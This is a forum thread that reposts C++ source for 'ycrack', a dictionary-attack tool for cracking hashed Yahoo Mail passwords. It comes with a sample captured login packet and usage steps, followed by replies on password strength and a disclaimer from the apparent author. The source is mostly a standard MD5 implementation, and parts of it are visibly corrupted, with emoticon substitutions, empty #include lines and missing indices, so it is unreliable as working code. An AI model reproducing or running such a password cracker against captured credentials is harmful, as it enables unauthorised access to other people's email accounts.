For those who have c++ knowledge..
*********************************
usage of the program is:
#./ycrack

Below is an example login packet. Note the strings following 'challenge=' and 'passwd='; those are what you are looking for.

GET /reg/login0/no_suli/login/us/ym/*http://login.yahoo.com/config/login?
.tries=1&.src=ym&.md5=&.hash=&.js=1&.last=&promo=&.intl=us&.bypass=&
.partner=&.u=08oidol1a8gav&.v=0&
.challenge=sHahwb_63ScGiwVT2q5lh7bi1JEv&.yplus=&.emailCode=&pkg=&
stepid=&.ev=&hasMsgr=0&.chkP=Y &.done=http%3A//mail.yahoo.com&login=xxxxxxxxxxxxxx
&passwd=0c5d98f1305bad4045863f78a335fc30 &.persistent=&.save=1&.hash=1&.md5=1 HTTP/1.1
Host: us.rd.yahoo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3
Accept: text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q= 0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://mail.yahoo.com/?.intl=us
Cookie: Y=v=1&n=ftsocmdj9pbtu&p=

You may use the hashed password and challenge text in this packet to test ycrack (the password used is 'beaver'). Example:

#./ycrack 0c5d98f1305bad4045863f78a335fc30 sHahwb_63ScGiwVT2q5lh7bi1JEv english_list.txt

The file english_list.txt is the dictionary (text file with one word per line)

This program compiles on both Linux and Mcft Windows platforms
Tool's Source Code:
Quote:
/* I'm not the best programmer, and I know this is a bit sloppy, but it works. Feel free to modify/optimize/do whatever you want
* with this code, just give me credit if it is due.
*
* Description:
* ycrack performs a dictionary attack on hashed Yahoo mail passwords. See the readme file for more information on Yahoo's
* implementation of the MD5 hashing algorithm. Standard MD5 functions are from RSA Data Security.
*
* Usage:
* #./ycrack
*
* Compilation:
* Compiles on both Linux and Windows platforms (tested on Windows XP and Linux 2.4.21)
* #g++ ycrack.cpp -o ycrack
*
* Craig Heffner
* (03/06/05)
*/

/////////////////////////////////////////////////////////////////////////
//
// Copyright (C) 1991-2, RSA Data Security, Inc. Created 1991. All
// rights reserved.
//
// License to copy and use this software is granted provided that it
// is identified as the "RSA Data Security, Inc. MD5 Message-Digest
// Algorithm" in all material mentioning or referencing this software
// or this function.
// License is also granted to make and use derivative works provided
// that such works are identified as "derived from the RSA Data
// Security, Inc. MD5 Message-Digest Algorithm" in all material
// mentioning or referencing the derived work.
// RSA Data Security, Inc. makes no representations concerning either
// the merchantability of this software or the suitability of this
// software for any particular purpose. It is provided "as is"
// without express or implied warranty of any kind.
// These notices must be retained in any copies of any part of this
// documentation and/or software.
/////////////////////////////////////////////////////////////////////////

#include
#include
#include
#include
#include

//md5.h file:
typedef unsigned int uint4;
typedef unsigned short int uint2;
typedef unsigned char uchar;

char* PrintMD5(uchar md5Digest[16]);
char* MD5String(char* szString);
char* MD5File(char* szFilename);

class md5
{
// Methods
public:
md5() { Init(); }
void Init();
void Update(uchar* chInput, uint4 nInputLen);
void Finalize();
uchar* Digest() { return m_Digest; }

private:

void Transform(uchar* block);
void Encode(uchar* dest, uint4* src, uint4 nLength);
void Decode(uint4* dest, uchar* src, uint4 nLength);


inline uint4 rotate_left(uint4 x, uint4 n)
{ return ((x << n) | (x >> (32-n))); }

inline uint4 F(uint4 x, uint4 y, uint4 z)
{ return ((x & y) | (~x & z)); }

inline uint4 G(uint4 x, uint4 y, uint4 z)
{ return ((x & z) | (y & ~z)); }

inline uint4 H(uint4 x, uint4 y, uint4 z)
{ return (x ^ y ^ z); }

inline uint4 I(uint4 x, uint4 y, uint4 z)
{ return (y ^ (x | ~z)); }

inline void FF(uint4& a, uint4 b, uint4 c, uint4 d, uint4 x, uint4 s, uint4 ac)
{ a += F(b, c, d) + x + ac; a = rotate_left(a, s); a += b; }

inline void GG(uint4& a, uint4 b, uint4 c, uint4 d, uint4 x, uint4 s, uint4 ac)
{ a += G(b, c, d) + x + ac; a = rotate_left(a, s); a += b; }

inline void HH(uint4& a, uint4 b, uint4 c, uint4 d, uint4 x, uint4 s, uint4 ac)
{ a += H(b, c, d) + x + ac; a = rotate_left(a, s); a += b; }

inline void II(uint4& a, uint4 b, uint4 c, uint4 d, uint4 x, uint4 s, uint4 ac)
{ a += I(b, c, d) + x + ac; a = rotate_left(a, s); a += b; }

// Data
private:
uint4 m_State[4];
uint4 m_Count[2];
uchar m_Buffer[64];
uchar m_Digest[16];
uchar m_Finalized;

};
//end of md5.h

/*Start of MD5 code*/
static unsigned char PADDING[64] =
{
0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
};

#define S11 7
#define S12 12
#define S13 17
#define S14 22
#define S21 5
#define S22 9
#define S23 14
#define S24 20
#define S31 4
#define S32 11
#define S33 16
#define S34 23
#define S41 6
#define S42 10
#define S43 15
#define S44 21


// PrintMD5: Converts a completed md5 digest into a char* string.
char* PrintMD5(uchar md5Digest[16])
{
char chBuffer[256];
char chEach[10];
int nCount;

memset(chBuffer,0,256);
memset(chEach, 0, 10);

for (nCount = 0; nCount < 16; nCount++)
{
sprintf(chEach, "%02x", md5Digest[nCount]);
strncat(chBuffer, chEach, sizeof(chEach));
}

return strdup(chBuffer);
}

// MD5String: Performs the MD5 algorithm on a char* string, returning
// the results as a char*.
char* MD5String(char* szString)
{
int nLen = strlen(szString);
md5 alg;

alg.Update((unsigned char*)szString, (unsigned int)nLen);
alg.Finalize();

return PrintMD5(alg.Digest());

}

// md5::Init
// Initializes a new context.
void md5::Init()
{
memset(m_Count, 0, 2 * sizeof(uint4));

m_State[0] = 0x67452301;
m_State[1] = 0xefcdab89;
m_State[2] = 0x98badcfe;
m_State[3] = 0x10325476;
}

// md5::Update
// MD5 block update operation. Continues an MD5 message-digest
// operation, processing another message block, and updating the
// context.
void md5::Update(uchar* chInput, uint4 nInputLen)
{
uint4 i, index, partLen;

// Compute number of bytes mod 64
index = (unsigned int)((m_Count[0] >> 3) & 0x3F);

// Update number of bits
if ((m_Count[0] += (nInputLen << 3)) < (nInputLen << 3))
m_Count[1]++;

m_Count[1] += (nInputLen >> 29);

partLen = 64 - index;

// Transform as many times as possible.
if (nInputLen >= partLen)
{
memcpy( &m_Buffer[index], chInput, partLen );
Transform(m_Buffer);

for (i = partLen; i + 63 < nInputLen; i += 64)
Transform(&chInput);

index = 0;
}
else
i = 0;

// Buffer remaining input
memcpy( &m_Buffer[index], &chInput, nInputLen-i );
}

// md5::Finalize
// MD5 finalization. Ends an MD5 message-digest operation, writing
// the message digest and zeroizing the context.
void md5::Finalize()
{
uchar bits[8];
uint4 index, padLen;

// Save number of bits
Encode (bits, m_Count, Cool;

// Pad out to 56 mod 64
index = (unsigned int)((m_Count[0] >> 3) & 0x3f);
padLen = (index < 56) ? (56 - index) : (120 - index);
Update(PADDING, padLen);

// Append length (before padding)
Update (bits, Cool;

// Store state in digest
Encode (m_Digest, m_State, 16);

memset(m_Count, 0, 2 * sizeof(uint4));
memset(m_State, 0, 4 * sizeof(uint4));
memset(m_Buffer,0, 64 * sizeof(uchar));
}

// md5::Transform
// MD5 basic transformation. Transforms state based on block.
void md5::Transform (uchar* block)
{
uint4 a = m_State[0], b = m_State[1], c = m_State[2], d = m_State[3], x[16];

Decode (x, block, 64);

// Round 1
FF (a, b, c, d, x[ 0], S11, 0xd76aa478);
FF (d, a, b, c, x[ 1], S12, 0xe8c7b756);
FF (c, d, a, b, x[ 2], S13, 0x242070db);
FF (b, c, d, a, x[ 3], S14, 0xc1bdceee);
FF (a, b, c, d, x[ 4], S11, 0xf57c0faf);
FF (d, a, b, c, x[ 5], S12, 0x4787c62a);
FF (c, d, a, b, x[ 6], S13, 0xa8304613);
FF (b, c, d, a, x[ 7], S14, 0xfd469501);
FF (a, b, c, d, x[ 8], S11, 0x698098d8);
FF (d, a, b, c, x[ 9], S12, 0x8b44f7af);
FF (c, d, a, b, x[10], S13, 0xffff5bb1);
FF (b, c, d, a, x[11], S14, 0x895cd7be);
FF (a, b, c, d, x[12], S11, 0x6b901122);
FF (d, a, b, c, x[13], S12, 0xfd987193);
FF (c, d, a, b, x[14], S13, 0xa679438e);
FF (b, c, d, a, x[15], S14, 0x49b40821);

// Round 2
GG (a, b, c, d, x[ 1], S21, 0xf61e2562);
GG (d, a, b, c, x[ 6], S22, 0xc040b340);
GG (c, d, a, b, x[11], S23, 0x265e5a51);
GG (b, c, d, a, x[ 0], S24, 0xe9b6c7aa);
GG (a, b, c, d, x[ 5], S21, 0xd62f105d);
GG (d, a, b, c, x[10], S22, 0x2441453);
GG (c, d, a, b, x[15], S23, 0xd8a1e681);
GG (b, c, d, a, x[ 4], S24, 0xe7d3fbc8);
GG (a, b, c, d, x[ 9], S21, 0x21e1cde6);
GG (d, a, b, c, x[14], S22, 0xc33707d6);
GG (c, d, a, b, x[ 3], S23, 0xf4d50d87);
GG (b, c, d, a, x[ 8], S24, 0x455a14ed);
GG (a, b, c, d, x[13], S21, 0xa9e3e905);
GG (d, a, b, c, x[ 2], S22, 0xfcefa3f8);
GG (c, d, a, b, x[ 7], S23, 0x676f02d9);
GG (b, c, d, a, x[12], S24, 0x8d2a4c8a);

// Round 3
HH (a, b, c, d, x[ 5], S31, 0xfffa3942);
HH (d, a, b, c, x[ 8], S32, 0x8771f681);
HH (c, d, a, b, x[11], S33, 0x6d9d6122);
HH (b, c, d, a, x[14], S34, 0xfde5380c);
HH (a, b, c, d, x[ 1], S31, 0xa4beea44);
HH (d, a, b, c, x[ 4], S32, 0x4bdecfa9);
HH (c, d, a, b, x[ 7], S33, 0xf6bb4b60);
HH (b, c, d, a, x[10], S34, 0xbebfbc70);
HH (a, b, c, d, x[13], S31, 0x289b7ec6);
HH (d, a, b, c, x[ 0], S32, 0xeaa127fa);
HH (c, d, a, b, x[ 3], S33, 0xd4ef3085);
HH (b, c, d, a, x[ 6], S34, 0x4881d05);
HH (a, b, c, d, x[ 9], S31, 0xd9d4d039);
HH (d, a, b, c, x[12], S32, 0xe6db99e5);
HH (c, d, a, b, x[15], S33, 0x1fa27cf8);
HH (b, c, d, a, x[ 2], S34, 0xc4ac5665);

// Round 4
II (a, b, c, d, x[ 0], S41, 0xf4292244);
II (d, a, b, c, x[ 7], S42, 0x432aff97);
II (c, d, a, b, x[14], S43, 0xab9423a7);
II (b, c, d, a, x[ 5], S44, 0xfc93a039);
II (a, b, c, d, x[12], S41, 0x655b59c3);
II (d, a, b, c, x[ 3], S42, 0x8f0ccc92);
II (c, d, a, b, x[10], S43, 0xffeff47d);
II (b, c, d, a, x[ 1], S44, 0x85845dd1);
II (a, b, c, d, x[ 8], S41, 0x6fa87e4f);
II (d, a, b, c, x[15], S42, 0xfe2ce6e0);
II (c, d, a, b, x[ 6], S43, 0xa3014314);
II (b, c, d, a, x[13], S44, 0x4e0811a1);
II (a, b, c, d, x[ 4], S41, 0xf7537e82);
II (d, a, b, c, x[11], S42, 0xbd3af235);
II (c, d, a, b, x[ 2], S43, 0x2ad7d2bb);
II (b, c, d, a, x[ 9], S44, 0xeb86d391);

m_State[0] += a;
m_State[1] += b;
m_State[2] += c;
m_State[3] += d;

memset(x, 0, sizeof(x));
}

// md5::Encode
// Encodes input (uint4) into output (uchar). Assumes nLength is
// a multiple of 4.
void md5::Encode(uchar* dest, uint4* src, uint4 nLength)
{
uint4 i, j;

assert(nLength % 4 == 0);

for (i = 0, j = 0; j < nLength; i++, j += 4)
{
dest[j] = (uchar)(src & 0xff);
dest[j+1] = (uchar)((src >> Cool & 0xff);
dest[j+2] = (uchar)((src >> 16) & 0xff);
dest[j+3] = (uchar)((src >> 24) & 0xff);
}
}

// md5::Decode
// Decodes input (uchar) into output (uint4). Assumes nLength is
// a multiple of 4.
void md5::Decode(uint4* dest, uchar* src, uint4 nLength)
{
uint4 i, j;

assert(nLength % 4 == 0);

for (i = 0, j = 0; j < nLength; i++, j += 4)
{
dest = ((uint4)src[j]) | (((uint4)src[j+1])< (((uint4)src[j+2])<<16) | (((uint4)src[j+3])<<24);
}
}
/*End of MD5 code*/

int main(int argc,char *argv[])
{
char *hash1,*challenge,*string,*hash2,*crypt,*file,test[256],c,stuff[256],*string2;
int len;

if(!argv[1] || !argv[2] || !argv[3])
{
printf("\nUsage: ycrack \n");
return 0;
}

crypt=argv[1]; //password hash
challenge=argv[2]; //challenge text
file=argv[3]; //word file

FILE *f;
f=fopen(file,"r"); //open word list
if(!f){printf("\nError opening file %s\n",file);return 0;}
do{ //read each word into variable 'string'
c=fscanf(f,"%s",test);
string=test;
printf("Trying:%s\n",string);
hash1=MD5String(string); //get MD5 hash of the password
memcpy(&stuff[0],hash1,32); //copy the hashed password into stuff
memcpy(&stuff[32],challenge,2Cool; //append challenge text onto the end of the password hash
memcpy(&stuff[60],"",3); //clear extra characters inserted by memcpy
hash2=MD5String(stuff); //calculate final hash
if(strcmp(crypt,hash2)==0){ //compare hash2 to the captured hash
printf("\nThe Yahoo password is: %s\n",string);
fclose(f);
return 0;}
}while(c!=EOF); //read until End Of File
fclose(f);
printf("\nPassword not found!\n");
return 0;
}

View/Share this post only

Does it works? If yes,why are u making it public? I m having a yahoo account :-S ,dont do that .

It may work, but its a dictionary attack. if you have your password an alphanumeric string than this program will not work for that, and I think Yahoo uses 128 bit encryption ie. 2^128 combinations to look for if you want to redirect the whole packet. Good luck with your hacking code.I think yahoo will block access to your email after 3 unsuccessful login, and you want to use dictionary hacking. Have fun working with it and try hacking my p@$$w0rd. (Sorry its not a dictionary word.)

So what would you suggest a good password type would be?

Any word from the dictionary would be the easiest to crack.

Any non-dictionary word that is made only of letters is probably second easiest to crack.

How about alpha-numeric combinations of 6 characters or more? That should be pretty hard, no?

Perhaps putting symbols such as % or $ or # or @ makes the password even more difficut to crack, right?

Whaddya say?

http://www.craigheffner.com/programming.html , the guy who wrote this code is Craig Heffner. He is actually interested in security stuffs. As per him, the code actually test the strength of your password.

This is just a dictionary password cracker, there is no way that its going to work, brute force is the worst way of cracking the password it may takes days to get the password if the password is a dictionary word. The md5 algorithm is in one of the .js file in the yahoo mail itself the tough thing is reversing the MD5 hash which is practically impossible although recent studies have theoritically reversed the MD5 hash, people you dont need to be afraid of this crack, i mean this crack was like 4 years old now.

Socail Engineering is a better way to get someones password and it works if know where to dig information

this technique is atleast 10 years old.. i knew about it in 1998..but it surely existed way before that...

In hackers' view finding someone's password is not hacking, its cracking. Hacking is the real stuff, making your machine work in your way. Cyberdude was right, using BruteForce you would have to check eveything one by one. If you consider the permutation of the letters in your dictionary and implement the Brute Force searching technology to find the password. Good Luck...

The number of candidate in your case is 4.03291461 × 10^26 or 40.329 millions quadrillion, that means let your computer do the job and it will take you 5.32262047 × 10^10 years or 53.22 billion years provided that your computer is P4 2.4 GHz. Wanna start hacking my password now???

I don't think so....

Hey, try to crack my password then.. ha ha... I bet you guys can't, because on of the characters in my password is not even in your keyboard.. ha ha.. how will you hack??? idiots.

View/Share this post only

forgot to give you my email.... billgates at yahoo dot com

I saw a bunch of people visiting my site from here, so I came on over to check it out. Let me try to clarify some things about Ycrack and password cracking in general:

1) No, you don't have to worry about this code because Yahoo no longer uses this encryption. They have since switched over to SSL encryption (which is probably worse, IMHO).

2) Yes, this technique (dictionary attack) is old - about as old as passwords themselves. The only reason I wrote this code was because Yahoo actually ran the password through the MD5 function twice, which no other password crackers (to my knowledge) took into account. However, just because it is old doesn't mean that that you shouldn't fear it - dictionary and brute force attacks still work, so just make sure your password is strong. I mean, I still fear a guy with a 14th century sword... :)

3) Speaking of passwords, something like 'beaver1' is not a strong password...many password cracking lists have similar permutations of dictionary words and will therefore be able to crack the password using a dictionary attack. A strong password should contain multiple numbers and symbols and upper and lowercase characters, and be at least 8 characters long.

4) I think some people are confusing dictionary attack with brute force - yes, brute forcing a password can take forever, but that's why I made this a dictionary attack. Depending on the size of your word list (and the strength of your password), dictionary attacks could take a few minutes or a few days and may or may not be successful (ycrack can go through all the words in the english dictionary in a few minutes on a 1.6GHz machine).

5) Yahoo locking out your account after 3 tries is not an issue here because ycrack does not actually try to log into your account. You must capture a login packet (data going from your web browser to the yahoo server that contains your encrypted password), then feed the encrypted password to ycrack and it performs an offline dictionary attack.

6) If you're interested in password cracking, check out www.openwall.com/john (John The Ripper, a very fast password cracker) and parallel computing (openmosix.org is a good start).

7) DISCLAIMER: I don't hack people's accounts and I don't encourage or support anyone who does. Using anything I've written or linked to for malicious purposes is entirely on you, and if you don't know what you're doing you'll probably get caught - don't come crying to me.

We're honored to have you here Craig!!! :)

Thanks! :)

Hey cheff thanks for being over here, i was just trying to say that the code you wrote is not something that people should freak about or try it and get dissapointed.

Semms like you did this for GCC. not a frequest C++ guy kinda got into C# due to demands.

Take care keep posting

Cheff
Thankz for sharing.

Shweta